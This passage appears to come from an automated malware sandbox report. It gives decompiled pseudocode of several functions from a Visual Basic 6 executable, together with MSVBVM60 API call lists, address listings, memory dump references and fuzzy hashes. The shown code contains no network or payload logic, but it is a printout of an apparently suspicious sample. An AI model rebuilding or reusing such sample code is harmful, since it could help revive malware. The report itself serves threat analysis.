					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v48);
					L0040139C();
					L004013E4();
					_push( &_v60);
					_push( &_v56);
					_push(2);
					L004013F6();
					_push( &_v92);
					_t40 =  &_v76;
					_push(_t40);
					_push(2);
					L0040141A();
				}
				_push(0x413638);
				L004013F0();
				L004013E4();
				L004013DE();
				return _t40;
			}






















        0x004134a1
        0x004134ac
        0x004134ad
        0x004134b6
        0x004134b7
        0x004134bf
        0x004134c2
        0x004134cf
        0x004134da
        0x004134df
        0x004134e4
        0x004134ec
        0x004134f9
        0x00413513
        0x004134fb
        0x004134fb
        0x00413500
        0x00413505
        0x0041350a
        0x0041350a
        0x0041352e
        0x00413532
        0x00413537
        0x00413546
        0x0041354c
        0x0041354e
        0x00413555
        0x00413571
        0x00413557
        0x00413557
        0x0041355c
        0x00413561
        0x00413564
        0x00413567
        0x0041356c
        0x0041356c
        0x00413575
        0x00413577
        0x00413579
        0x0041357b
        0x0041357e
        0x00413581
        0x00413582
        0x0041358a
        0x0041358b
        0x00413595
        0x0041359a
        0x0041359e
        0x0041359f
        0x004135a4
        0x004135a7
        0x004135b1
        0x004135b2
        0x004135b3
        0x004135b4
        0x004135b5
        0x004135b7
        0x004135ba
        0x004135c2
        0x004135ca
        0x004135ce
        0x004135cf
        0x004135d1
        0x004135dc
        0x004135dd
        0x004135e0
        0x004135e1
        0x004135e3
        0x004135e8
        0x004135eb
        0x00413622
        0x0041362a
        0x00413632
        0x00413637

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 004134B7
        • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 004134CF
        • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 004134DA
        • __vbaLenBstr.MSVBVM60(004035FC,?,?,?,?,004012A6), ref: 004134E4
        • __vbaNew2.MSVBVM60(00402AA4,00415010,004035FC,?,?,?,?,004012A6), ref: 00413505
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413532
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,000001B8), ref: 00413567
        • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,00000000), ref: 00413582
        • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041358B
        • __vbaStrMove.MSVBVM60(00000000), ref: 00413595
        • #716.MSVBVM60(?,00000000,00000000), ref: 0041359F
        • __vbaChkstk.MSVBVM60(?,00000000,00000000), ref: 004135A7
        • __vbaLateIdSt.MSVBVM60(?,00000000,?,00000000,00000000), ref: 004135BA
        • __vbaFreeStr.MSVBVM60(?,00000000,?,00000000,00000000), ref: 004135C2
        • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,00000000,?,00000000,00000000), ref: 004135D1
        • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,00000000,00000000), ref: 004135E3
        • __vbaFreeVar.MSVBVM60(00413638,004035FC,?,?,?,?,004012A6), ref: 00413622
        • __vbaFreeStr.MSVBVM60(00413638,004035FC,?,?,?,?,004012A6), ref: 0041362A
        • __vbaFreeObj.MSVBVM60(00413638,004035FC,?,?,?,?,004012A6), ref: 00413632
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$Free$ChkstkLateListMove$#716BstrCallCheckCopyHresultNew2
        • String ID: 86A
        • API String ID: 3693719564-1576963401
        • Opcode ID: 5f52d71091dec1245790a9ade2b47c8755a903cd38e3ad92d42c83f245b4c119
        • Instruction ID: 929b7291a570490ed47ef2e2989bf99eb98350767b55e170eaa55bf49a56981a
        • Opcode Fuzzy Hash: 5f52d71091dec1245790a9ade2b47c8755a903cd38e3ad92d42c83f245b4c119
        • Instruction Fuzzy Hash: 62412C71D00208ABDB10EFE1CC86FDD7B79AF08704F60042AF501BB1E2DB796A458B59
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00413781, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 106COMMON
        Download Yara Rule
        C-Code - Quality: 65%
        			E00413781(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a28, void* _a48) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v40;
				signed int _v44;
				char _v48;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v72;
				char _v80;
				void* _v84;
				signed int _v88;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				signed int _t49;
				char* _t53;
				char* _t57;
				signed int _t61;
				intOrPtr _t87;

				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t87;
				_push(0x54);
				L004012A0();
				_v12 = _t87;
				_v8 = 0x4011f0;
				L00401420();
				L004013D8();
				_v72 = 0x40361c;
				_v80 = 8;
				L00401420();
				_t49 =  &_v64;
				_push(_t49);
				L00401378();
				L004013EA();
				_push(_t49);
				_push(0);
				L0040137E();
				asm("sbb eax, eax");
				_v84 =  ~( ~_t49 + 1);
				L004013E4();
				L004013F0();
				_t53 = _v84;
				if(_t53 != 0) {
					if( *0x415010 != 0) {
						_v100 = 0x415010;
					} else {
						_push(0x415010);
						_push(0x402aa4);
						L00401408();
						_v100 = 0x415010;
					}
					_t57 =  &_v48;
					L0040140E();
					_v84 = _t57;
					_t61 =  *((intOrPtr*)( *_v84 + 0x50))(_v84,  &_v44, _t57,  *((intOrPtr*)( *((intOrPtr*)( *_v100)) + 0x310))( *_v100));
					asm("fclex");
					_v88 = _t61;
					if(_v88 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x4034ec);
						_push(_v84);
						_push(_v88);
						L00401402();
						_v104 = _t61;
					}
					_v96 = _v44;
					_v44 = _v44 & 0x00000000;
					_v56 = _v96;
					_v64 = 8;
					_t53 =  &_v64;
					_push(_t53);
					L00401372();
					L004013DE();
					L004013F0();
				}
				_push(0x4138fd);
				L004013F0();
				L004013E4();
				return _t53;
			}























        0x00413786
        0x00413791
        0x00413792
        0x00413799
        0x0041379c
        0x004137a4
        0x004137a7
        0x004137b4
        0x004137bf
        0x004137c4
        0x004137cb
        0x004137d8
        0x004137dd
        0x004137e0
        0x004137e1
        0x004137eb
        0x004137f0
        0x004137f1
        0x004137f3
        0x004137fa
        0x004137ff
        0x00413806
        0x0041380e
        0x00413813
        0x00413819
        0x00413826
        0x00413840
        0x00413828
        0x00413828
        0x0041382d
        0x00413832
        0x00413837
        0x00413837
        0x0041385b
        0x0041385f
        0x00413864
        0x00413873
        0x00413876
        0x00413878
        0x0041387f
        0x00413898
        0x00413881
        0x00413881
        0x00413883
        0x00413888
        0x0041388b
        0x0041388e
        0x00413893
        0x00413893
        0x0041389f
        0x004138a2
        0x004138a9
        0x004138ac
        0x004138b3
        0x004138b6
        0x004138b7
        0x004138bf
        0x004138c7
        0x004138c7
        0x004138cc
        0x004138ef
        0x004138f7
        0x004138fc

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0041379C
        • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 004137B4
        • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 004137BF
        • __vbaVarDup.MSVBVM60 ref: 004137D8
        • #667.MSVBVM60(?), ref: 004137E1
        • __vbaStrMove.MSVBVM60(?), ref: 004137EB
        • __vbaStrCmp.MSVBVM60(00000000,00000000,?), ref: 004137F3
        • __vbaFreeStr.MSVBVM60(00000000,00000000,?), ref: 00413806
        • __vbaFreeVar.MSVBVM60(00000000,00000000,?), ref: 0041380E
        • __vbaNew2.MSVBVM60(00402AA4,00415010,00000000,00000000,?), ref: 00413832
        • __vbaObjSet.MSVBVM60(?,00000000,?,?,00000000,00000000,?), ref: 0041385F
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034EC,00000050,?,?,00000000,00000000,?), ref: 0041388E
        • #529.MSVBVM60(00000008,?,?,00000000,00000000,?), ref: 004138B7
        • __vbaFreeObj.MSVBVM60(00000008,?,?,00000000,00000000,?), ref: 004138BF
        • __vbaFreeVar.MSVBVM60(00000008,?,?,00000000,00000000,?), ref: 004138C7
        • __vbaFreeVar.MSVBVM60(004138FD,00000000,00000000,?), ref: 004138EF
        • __vbaFreeStr.MSVBVM60(004138FD,00000000,00000000,?), ref: 004138F7
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$Free$#529#667CheckChkstkCopyHresultMoveNew2
        • String ID: tmp
        • API String ID: 937098853-753892680
        • Opcode ID: c782f21573f9eaaf50ebc7275860f4f55f4bd7dd37994fee3389416c807256dc
        • Instruction ID: d0857369b2a674543e4f0577f89e66e15bbb184188813467b80bd3d10f8a1f5d
        • Opcode Fuzzy Hash: c782f21573f9eaaf50ebc7275860f4f55f4bd7dd37994fee3389416c807256dc
        • Instruction Fuzzy Hash: 0041FA71D10208AFDB04EFE5C895BDDBBB8BF08709F50442AF401BB6A1DB789949CB58
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00413E15, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 148COMMON
        Download Yara Rule
        C-Code - Quality: 51%
        			E00413E15(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v44;
				char _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				void* _v72;
				signed int _v76;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				char _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _t65;
				char* _t69;
				signed int _t75;
				char* _t80;
				signed int _t84;
				signed int _t88;
				intOrPtr _t106;

				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t106;
				_push(0x60);
				L004012A0();
				_v12 = _t106;
				_v8 = 0x401258;
				_v44 = 0x2719e0;
				_v52 = 3;
				_t65 =  &_v52;
				_push(_t65);
				L0040134E();
				L004013EA();
				_push(_t65);
				_push(L"Long");
				L0040137E();
				asm("sbb eax, eax");
				_v72 =  ~( ~( ~_t65));
				L004013E4();
				L004013F0();
				_t69 = _v72;
				if(_t69 != 0) {
					if( *0x41565c != 0) {
						_v100 = 0x41565c;
					} else {
						_push(0x41565c);
						_push(0x4036a4);
						L00401408();
						_v100 = 0x41565c;
					}
					_t13 =  &_v100; // 0x41565c
					_v80 =  *((intOrPtr*)( *_t13));
					_t75 =  *((intOrPtr*)( *_v80 + 0x1c))(_v80,  &_v36);
					asm("fclex");
					_v84 = _t75;
					if(_v84 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x403694);
						_push(_v80);
						_push(_v84);
						L00401402();
						_v104 = _t75;
					}
					_v88 = _v36;
					_v60 = 0x80020004;
					_v68 = 0xa;
					if( *0x415010 != 0) {
						_v108 = 0x415010;
					} else {
						_push(0x415010);
						_push(0x402aa4);
						L00401408();
						_v108 = 0x415010;
					}
					_t80 =  &_v32;
					L0040140E();
					_v72 = _t80;
					_t84 =  *((intOrPtr*)( *_v72 + 0xf8))(_v72,  &_v28, _t80,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x2fc))( *_v108));
					asm("fclex");
					_v76 = _t84;
					if(_v76 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x40350c);
						_push(_v72);
						_push(_v76);
						L00401402();
						_v112 = _t84;
					}
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t88 =  *((intOrPtr*)( *_v88 + 0x60))(_v88, _v28, 0x10);
					asm("fclex");
					_v92 = _t88;
					if(_v92 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x4036d4);
						_push(_v88);
						_push(_v92);
						L00401402();
						_v116 = _t88;
					}
					L004013E4();
					_push( &_v36);
					_t69 =  &_v32;
					_push(_t69);
					_push(2);
					L004013F6();
				}
				_push(0x41401c);
				return _t69;
			}






























        0x00413e1a
        0x00413e25
        0x00413e26
        0x00413e2d
        0x00413e30
        0x00413e38
        0x00413e3b
        0x00413e42
        0x00413e49
        0x00413e50
        0x00413e53
        0x00413e54
        0x00413e5e
        0x00413e63
        0x00413e64
        0x00413e69
        0x00413e70
        0x00413e76
        0x00413e7d
        0x00413e85
        0x00413e8a
        0x00413e90
        0x00413e9d
        0x00413eb7
        0x00413e9f
        0x00413e9f
        0x00413ea4
        0x00413ea9
        0x00413eae
        0x00413eae
        0x00413ebe
        0x00413ec3
        0x00413ed2
        0x00413ed5
        0x00413ed7
        0x00413ede
        0x00413ef7
        0x00413ee0
        0x00413ee0
        0x00413ee2
        0x00413ee7
        0x00413eea
        0x00413eed
        0x00413ef2
        0x00413ef2
        0x00413efe
        0x00413f01
        0x00413f08
        0x00413f16
        0x00413f30
        0x00413f18
        0x00413f18
        0x00413f1d
        0x00413f22
        0x00413f27
        0x00413f27
        0x00413f4b
        0x00413f4f
        0x00413f54
        0x00413f63
        0x00413f69
        0x00413f6b
        0x00413f72
        0x00413f8e
        0x00413f74
        0x00413f74
        0x00413f79
        0x00413f7e
        0x00413f81
        0x00413f84
        0x00413f89
        0x00413f89
        0x00413f95
        0x00413f9f
        0x00413fa0
        0x00413fa1
        0x00413fa2
        0x00413fae
        0x00413fb1
        0x00413fb3
        0x00413fba
        0x00413fd3
        0x00413fbc
        0x00413fbc
        0x00413fbe
        0x00413fc3
        0x00413fc6
        0x00413fc9
        0x00413fce
        0x00413fce
        0x00413fda
        0x00413fe2
        0x00413fe3
        0x00413fe6
        0x00413fe7
        0x00413fe9
        0x00413fee
        0x00413ff1
        0x00000000

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 00413E30
        • #591.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,004012A6), ref: 00413E54
        • __vbaStrMove.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,004012A6), ref: 00413E5E
        • __vbaStrCmp.MSVBVM60(Long,00000000,00000003,?,?,?,?,?,?,?,?,?,004012A6), ref: 00413E69
        • __vbaFreeStr.MSVBVM60(Long,00000000,00000003,?,?,?,?,?,?,?,?,?,004012A6), ref: 00413E7D
        • __vbaFreeVar.MSVBVM60(Long,00000000,00000003,?,?,?,?,?,?,?,?,?,004012A6), ref: 00413E85
        • __vbaNew2.MSVBVM60(004036A4,0041565C,Long,00000000,00000003,?,?,?,?,?,?,?,?,?,004012A6), ref: 00413EA9
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403694,0000001C,?,?,?,?,?,?,?,?,?,Long,00000000,00000003), ref: 00413EED
        • __vbaNew2.MSVBVM60(00402AA4,00415010,?,?,?,?,?,?,?,?,?,Long,00000000,00000003), ref: 00413F22
        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,Long,00000000,00000003), ref: 00413F4F
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040350C,000000F8,?,?,?,?,?,?,?,?,?,?,?,Long), ref: 00413F84
        • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Long,00000000,00000003), ref: 00413F95
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004036D4,00000060,?,?,?,?,?,?,?,?,?,?,?,Long), ref: 00413FC9
        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,Long,00000000,00000003), ref: 00413FDA
        • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413FE9
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$Free$CheckHresult$ChkstkNew2$#591ListMove
        • String ID: Long$\VA
        • API String ID: 4240977972-3637417433
        • Opcode ID: 5a5a07a8485f6020474848aa7417a548495076e62a4d1ecf681f50461ee4eac7
        • Instruction ID: d0da23ec048c0b52f4cafce75401129a1b3e145376b9c792d14fa701529dd38d
        • Opcode Fuzzy Hash: 5a5a07a8485f6020474848aa7417a548495076e62a4d1ecf681f50461ee4eac7
        • Instruction Fuzzy Hash: 7A511770E50209EFDB11EFD1C846BEEBBB8BF08705F10402AE505BB2A1C7B85946DB59
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00414039, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 64COMMON
        Download Yara Rule
        C-Code - Quality: 57%
        			E00414039(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				char _v52;
				char _v68;
				char* _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v116;
				short _v120;
				short _t32;
				char* _t35;
				intOrPtr _t51;

				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t51;
				_push(0x68);
				L004012A0();
				_v12 = _t51;
				_v8 = 0x401268;
				_v92 = L"3:3:3";
				_v100 = 8;
				L00401420();
				_push( &_v52);
				_push( &_v68);
				L00401348();
				_v108 = 3;
				_v116 = 0x8002;
				_push( &_v68);
				_t32 =  &_v116;
				_push(_t32);
				L0040138A();
				_v120 = _t32;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L0040141A();
				_t35 = _v120;
				if(_t35 != 0) {
					_v92 = L"Scoptically8";
					_v100 = 8;
					L00401420();
					_push( &_v52);
					_t35 =  &_v68;
					_push(_t35);
					L00401342();
					L004013CC();
					L004013F0();
				}
				_push(0x414125);
				L004013F0();
				return _t35;
			}
















        0x0041403e
        0x00414049
        0x0041404a
        0x00414051
        0x00414054
        0x0041405c
        0x0041405f
        0x00414066
        0x0041406d
        0x0041407a
        0x00414082
        0x00414086
        0x00414087
        0x0041408c
        0x00414093
        0x0041409d
        0x0041409e
        0x004140a1
        0x004140a2
        0x004140a7
        0x004140ae
        0x004140b2
        0x004140b3
        0x004140b5
        0x004140bd
        0x004140c3
        0x004140c5
        0x004140cc
        0x004140d9
        0x004140e1
        0x004140e2
        0x004140e5
        0x004140e6
        0x004140f1
        0x004140f9
        0x004140f9
        0x004140fe
        0x0041411f
        0x00414124

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 00414054
        • __vbaVarDup.MSVBVM60 ref: 0041407A
        • #544.MSVBVM60(?,?), ref: 00414087
        • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 004140A2
        • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 004140B5
        • __vbaVarDup.MSVBVM60 ref: 004140D9
        • #666.MSVBVM60(?,?), ref: 004140E6
        • __vbaVarMove.MSVBVM60(?,?), ref: 004140F1
        • __vbaFreeVar.MSVBVM60(?,?), ref: 004140F9
        • __vbaFreeVar.MSVBVM60(00414125), ref: 0041411F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$Free$#544#666ChkstkListMove
        • String ID: 3:3:3$Scoptically8
        • API String ID: 2259135134-2331426405
        • Opcode ID: 65d941a48e9d3abeafba6e49b7c1748299d98390f984bc3f56569da627560640
        • Instruction ID: d5dadf6c2238fe2b218e31df11fc70e3b076bd6e0df54826bc8a8054300f9a05
        • Opcode Fuzzy Hash: 65d941a48e9d3abeafba6e49b7c1748299d98390f984bc3f56569da627560640
        • Instruction Fuzzy Hash: B621977181025CAADB10DBD1CC86EEDB7BCBF04704F54452EF501B75A1EB786A49CB94
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00414371, Relevance: 16.6, APIs: 11, Instructions: 121COMMON
        Download Yara Rule
        C-Code - Quality: 46%
        			E00414371(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				char _v48;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v72;
				intOrPtr* _v76;
				signed int _v80;
				signed int _v88;
				signed int _v92;
				char* _t52;
				signed int _t58;
				char* _t62;
				signed int _t66;
				void* _t81;
				intOrPtr _t83;

				 *[fs:0x0] = _t83;
				L004012A0();
				_v12 = _t83;
				_v8 = 0x401290;
				_t52 =  &_v24;
				L0040140E();
				_v76 = _t52;
				_v64 = 0x80020004;
				_v72 = 0xa;
				_v48 = 0x80020004;
				_v56 = 0xa;
				_v32 = 0x80020004;
				_v40 = 0xa;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v48 =  *0x401288;
				_t58 =  *((intOrPtr*)( *_v76 + 0x224))(_v76, __ecx, 0x10, 0x10, 0x10, _t52,  *((intOrPtr*)( *_a4 + 0x304))(_a4, __edi, __esi, __ebx, 0x48,  *[fs:0x0], 0x4012a6, __ecx, __ecx, _t81));
				asm("fclex");
				_v80 = _t58;
				if(_v80 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x224);
					_push(0x4034fc);
					_push(_v76);
					_push(_v80);
					L00401402();
					_v88 = _t58;
				}
				L004013DE();
				_t62 =  &_v24;
				L0040140E();
				_v76 = _t62;
				_v32 = 0x80020004;
				_v40 = 0xa;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t66 =  *((intOrPtr*)( *_v76 + 0x220))(_v76, 0x10, _t62,  *((intOrPtr*)( *_a4 + 0x308))(_a4));
				asm("fclex");
				_v80 = _t66;
				if(_v80 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x220);
					_push(0x4034fc);
					_push(_v76);
					_push(_v80);
					L00401402();
					_v92 = _t66;
				}
				L004013DE();
				asm("wait");
				_push(0x4144ea);
				return _t66;
			}






















        0x00414382
        0x0041438c
        0x00414394
        0x00414397
        0x004143ad
        0x004143b1
        0x004143b6
        0x004143b9
        0x004143c0
        0x004143c7
        0x004143ce
        0x004143d5
        0x004143dc
        0x004143e6
        0x004143f0
        0x004143f1
        0x004143f2
        0x004143f3
        0x004143f7
        0x00414401
        0x00414402
        0x00414403
        0x00414404
        0x00414408
        0x00414412
        0x00414413
        0x00414414
        0x00414415
        0x0041441d
        0x00414428
        0x0041442e
        0x00414430
        0x00414437
        0x00414453
        0x00414439
        0x00414439
        0x0041443e
        0x00414443
        0x00414446
        0x00414449
        0x0041444e
        0x0041444e
        0x0041445a
        0x0041446e
        0x00414472
        0x00414477
        0x0041447a
        0x00414481
        0x0041448b
        0x00414495
        0x00414496
        0x00414497
        0x00414498
        0x004144a1
        0x004144a7
        0x004144a9
        0x004144b0
        0x004144cc
        0x004144b2
        0x004144b2
        0x004144b7
        0x004144bc
        0x004144bf
        0x004144c2
        0x004144c7
        0x004144c7
        0x004144d3
        0x004144d8
        0x004144d9
        0x00000000

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0041438C
        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,004012A6), ref: 004143B1
        • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004012A6), ref: 004143E6
        • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004012A6), ref: 004143F7
        • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004012A6), ref: 00414408
        • __vbaHresultCheckObj.MSVBVM60(?,?,004034FC,00000224,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00414449
        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041445A
        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00414472
        • __vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041448B
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,00000220), ref: 004144C2
        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004144D3
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$Chkstk$CheckFreeHresult
        • String ID:
        • API String ID: 3206358699-0
        • Opcode ID: 2408109075e763793c48c36d0d20cac6015320c36f29f6ce177f6a2d9dd8f481
        • Instruction ID: 539cf2931a4b93f77d71c5e8f3987f03cbfae9ab2f6bdccf1bf3b6ea887ee98d
        • Opcode Fuzzy Hash: 2408109075e763793c48c36d0d20cac6015320c36f29f6ce177f6a2d9dd8f481
        • Instruction Fuzzy Hash: 974117B1D00608EFDB01DF95D94ABDEBBB5EF09704F20446AF500BB2A1C7B95A428F59
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00413910, Relevance: 15.1, APIs: 10, Instructions: 110COMMON
        Download Yara Rule
        C-Code - Quality: 53%
        			E00413910(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, long long __fp0) {
				intOrPtr _v8;
				long long* _v12;
				char _v24;
				char _v28;
				intOrPtr _v36;
				char _v44;
				intOrPtr _v52;
				char _v60;
				void* _v96;
				signed int _v100;
				signed int _v108;
				intOrPtr* _v112;
				signed int _v116;
				signed int _t46;
				char* _t50;
				long long* _t65;

				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t65;
				_push(0x60);
				L004012A0();
				_v12 = _t65;
				_v8 = 0x401208;
				_v52 = 0x80020004;
				_v60 = 0xa;
				_v36 = 0x80020004;
				_v44 = 0xa;
				_push( &_v60);
				_push( &_v44);
				asm("fld1");
				 *_t65 = __fp0;
				asm("fld1");
				 *_t65 = __fp0;
				asm("fld1");
				 *_t65 = __fp0;
				asm("fld1");
				 *_t65 = __fp0;
				L0040136C();
				L00401432();
				asm("fcomp qword [0x401200]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t10 =  &_v108;
					 *_t10 = _v108 & 0x00000000;
					__eflags =  *_t10;
				} else {
					_v108 = 1;
				}
				_v96 =  ~_v108;
				_push( &_v60);
				_push( &_v44);
				_push(2);
				L0040141A();
				_t46 = _v96;
				if(_t46 != 0) {
					if( *0x415010 != 0) {
						_v112 = 0x415010;
					} else {
						_push(0x415010);
						_push(0x402aa4);
						L00401408();
						_v112 = 0x415010;
					}
					_t50 =  &_v28;
					L0040140E();
					_v96 = _t50;
					_t46 =  *((intOrPtr*)( *_v96 + 0x150))(_v96,  &_v24, _t50,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x308))( *_v112));
					asm("fclex");
					_v100 = _t46;
					if(_v100 >= 0) {
						_t33 =  &_v116;
						 *_t33 = _v116 & 0x00000000;
						__eflags =  *_t33;
					} else {
						_push(0x150);
						_push(0x4034fc);
						_push(_v96);
						_push(_v100);
						L00401402();
						_v116 = _t46;
					}
					_push(_v24);
					L00401366();
					L004013E4();
					L004013DE();
				}
				asm("wait");
				_push(0x413a8d);
				return _t46;
			}



















        0x00413915
        0x00413920
        0x00413921
        0x00413928
        0x0041392b
        0x00413933
        0x00413936
        0x0041393d
        0x00413944
        0x0041394b
        0x00413952
        0x0041395c
        0x00413960
        0x00413961
        0x00413965
        0x00413968
        0x0041396c
        0x0041396f
        0x00413973
        0x00413976
        0x0041397a
        0x0041397d
        0x00413982
        0x00413987
        0x0041398d
        0x0041398f
        0x00413990
        0x0041399b
        0x0041399b
        0x0041399b
        0x00413992
        0x00413992
        0x00413992
        0x004139a4
        0x004139ab
        0x004139af
        0x004139b0
        0x004139b2
        0x004139ba
        0x004139c0
        0x004139cd
        0x004139e7
        0x004139cf
        0x004139cf
        0x004139d4
        0x004139d9
        0x004139de
        0x004139de
        0x00413a02
        0x00413a06
        0x00413a0b
        0x00413a1a
        0x00413a20
        0x00413a22
        0x00413a29
        0x00413a45
        0x00413a45
        0x00413a45
        0x00413a2b
        0x00413a2b
        0x00413a30
        0x00413a35
        0x00413a38
        0x00413a3b
        0x00413a40
        0x00413a40
        0x00413a49
        0x00413a4c
        0x00413a54
        0x00413a5c
        0x00413a5c
        0x00413a61
        0x00413a62
